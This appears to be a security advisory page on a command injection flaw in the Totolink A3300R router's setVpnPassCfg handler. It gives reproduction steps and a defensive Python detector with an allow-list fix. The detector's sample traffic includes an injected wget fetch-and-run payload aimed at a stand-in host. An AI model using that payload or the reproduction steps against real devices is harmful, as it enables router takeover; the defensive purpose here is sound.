Totolink A3300R Command Injection Vulnerability in VPN Parameter Handler

Vulnerability

A command injection vulnerability has been identified in the Totolink A3300R router, firmware version 17.0.0cu.557_b20221024. The flaw is in the VPN pass-through configuration handler: the function 'setVpnPassCfg' in '/cgi-bin/cstecgi.cgi' incorporates the value of the 'pptpPassThru' request parameter into an operating system command without sanitizing it. A remote attacker who can reach the web interface can therefore execute arbitrary OS commands on the router by sending a crafted request in which 'pptpPassThru' carries a shell payload instead of the expected on/off flag. Successful exploitation can lead to complete compromise of the affected device.

Impact

Successful exploitation gives the attacker arbitrary command execution on the router in the context of the CGI handler. With that foothold the attacker can fetch and run additional payloads (the public proof of concept uses 'wget' for exactly this) and alter the device's configuration, which in practice amounts to full device compromise.

Reproduction

To reproduce this vulnerability, send a POST request to '/cgi-bin/cstecgi.cgi' that invokes the 'setVpnPassCfg' handler, with the 'pptpPassThru' parameter set to a command payload rather than a 0/1 flag, for example a 'wget' command that fetches a file from an attacker-controlled host. The router executes the injected command. A proof-of-concept exploit demonstrating this is available on GitHub. For triage, any request to this endpoint in which 'pptpPassThru' contains anything other than a plain 0 or 1 (in particular shell metacharacters such as ';', '|', '&', '`' or '$(') should be treated as an exploitation attempt.
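The following is an added example, not code from the advisory or the GitHub proof of concept. It shows the check a defender would run over captured requests to '/cgi-bin/cstecgi.cgi': flag any 'setVpnPassCfg' call whose 'pptpPassThru' value is not a plain 0/1 flag, and separately shows the allow-list validation the handler should have applied. The 'topicurl' field used to select the handler, the JSON/form-encoded body shapes and the sample requests (including the 192.0.2.10 payload host) are constructed assumptions about the request format, not data taken from the advisory.

```python
import json
import re
from urllib.parse import parse_qs

CGI_PATH = "/cgi-bin/cstecgi.cgi"
HANDLER = "setVpnPassCfg"   # handler named in the advisory
PARAM = "pptpPassThru"      # injected parameter named in the advisory

# Shell metacharacters that have no business in an on/off pass-through flag.
SHELL_META = re.compile(r"[;&|`$(){}<>\n\r]")


def parse_body(body: str) -> dict:
    """Parse a POST body as JSON; fall back to application/x-www-form-urlencoded.

    Assumption: cstecgi.cgi selects its handler via a 'topicurl' field in the
    body. Adjust HANDLER/'topicurl' to match the request format in your captures.
    """
    try:
        obj = json.loads(body)
        return obj if isinstance(obj, dict) else {}
    except ValueError:
        return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def classify(body: str) -> str:
    """Classify one POST body as 'ignore', 'benign', 'malformed' or 'injection'."""
    params = parse_body(body)
    if params.get("topicurl") != HANDLER or PARAM not in params:
        return "ignore"
    value = str(params[PARAM])
    if value in ("0", "1"):
        return "benign"          # a real pass-through toggle
    if SHELL_META.search(value):
        return "injection"       # command separators inside a boolean flag
    return "malformed"           # not a flag, but no shell syntax either


def scan(requests) -> list:
    """Run classify() over (path, body) pairs, ignoring other endpoints."""
    return [classify(body) if path == CGI_PATH else "ignore"
            for path, body in requests]


def validate_passthru_flag(value) -> int:
    """The server-side check the handler should have done: strict allow-list.

    Returning an int guarantees nothing but 0 or 1 can ever reach a command
    line; anything else is rejected before the value is used.
    """
    if value in ("0", "1"):
        return int(value)
    raise ValueError(f"{PARAM} must be 0 or 1")


# Constructed sample traffic (not real captures): two legitimate toggles,
# one injection attempt shaped like the advisory's wget payload, one unrelated call.
SAMPLE_REQUESTS = [
    (CGI_PATH, '{"topicurl":"setVpnPassCfg","pptpPassThru":"1"}'),
    (CGI_PATH, '{"topicurl":"setVpnPassCfg",'
               '"pptpPassThru":"1;wget http://192.0.2.10/x -O /tmp/x;sh /tmp/x"}'),
    (CGI_PATH, "topicurl=setVpnPassCfg&pptpPassThru=0"),
    (CGI_PATH, '{"topicurl":"getSysStatusCfg"}'),
]


if __name__ == "__main__":
    for (path, body), verdict in zip(SAMPLE_REQUESTS, scan(SAMPLE_REQUESTS)):
        print(f"{verdict:10s} {body}")
```

The detector keys on the parameter's expected type rather than on the specific 'wget' string from the proof of concept, so variants that use 'curl', 'tftp' or a backgrounded shell are caught the same way. The allow-list validator is the corresponding fix on the firmware side: a boolean setting should be coerced to an integer before it goes anywhere near a command.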

Added: Mar 30, 2026, 4:18 AM
Updated: Mar 30, 2026, 4:18 AM

Vulnerability Rating

Custom Algorithm

  spread          4.5
  impact          7.5
  exploitability  9.1
  remediation     0.0
  relevance       4.9
  threat          6.4
  urgency         2.9
  incentive       8.3

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.